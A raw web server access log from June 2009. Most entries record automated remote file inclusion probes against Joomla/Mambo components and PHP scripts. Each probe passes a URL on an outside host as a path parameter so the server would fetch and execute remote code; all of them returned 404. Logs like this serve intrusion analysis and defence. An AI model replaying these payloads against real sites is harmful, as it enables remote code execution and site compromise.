74.6.17.151 - - [15/Jun/2009:01:28:22 -0400] "GET /logs/error_log.Q107110900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [15/Jun/2009:01:28:37 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:01:28:40 -0400] "GET /logs/access_log.Q109010700%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:01:28:44 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:28:44 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:01:28:44 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.146.231.193 - - [15/Jun/2009:01:28:56 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.146.231.193 - - [15/Jun/2009:01:28:56 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [15/Jun/2009:01:29:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.52.15 - - [15/Jun/2009:01:29:05 -0400] "GET /logs/error_log.Q109060400/index.php?DOCUMENT_ROOT=http://www.rollingdogranch.net/images/uploads/de/l333tbi1tX.txt????? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.64.52.15 - - [15/Jun/2009:01:29:05 -0400] "GET /index.php?DOCUMENT_ROOT=http://www.rollingdogranch.net/images/uploads/de/l333tbi1tX.txt????? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
